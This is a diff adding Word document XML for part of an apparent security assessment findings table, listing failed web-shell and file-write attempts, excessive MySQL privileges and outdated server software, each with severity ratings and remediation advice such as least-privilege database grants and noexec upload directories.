+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>3. File upload / web stager write attempts (failed)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">If successful → </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>webshell</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> → RCE</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Medium (attempts failed)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>High</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> (if writeable) / Medium (current)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Ensure DB user lacks FILE and OUTFILE privileges; ensure </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>webroot</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> is not writable by DB process; set strict filesystem permissions; use </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>noexec</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> on upload dirs.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Medium</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>P1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="619"/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>4. OS-shell / web backdoor possibility (attempts failed)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Remote code execution if upload/execution possible</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Medium</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>High</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Same as #3; additionally disable dangerous SQL functions; restrict execution of user-supplied content; enable app sandboxing.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Medium</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>P1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="619"/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>5. Excessive DB privileges / insecure MySQL config</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Data theft, host pivot</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>High</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>High</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Apply least privilege to DB account (only required SELECT/INSERT/UPDATE); revoke </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>SUPER</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>FILE</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>PROCESS</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> etc unless needed; audit grants.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Low</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>P0</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="820"/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>6. Outdated OS / Apache / PHP / MySQL versions</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Known public exploits → RCE, LPE</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>High (old EOL versions)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
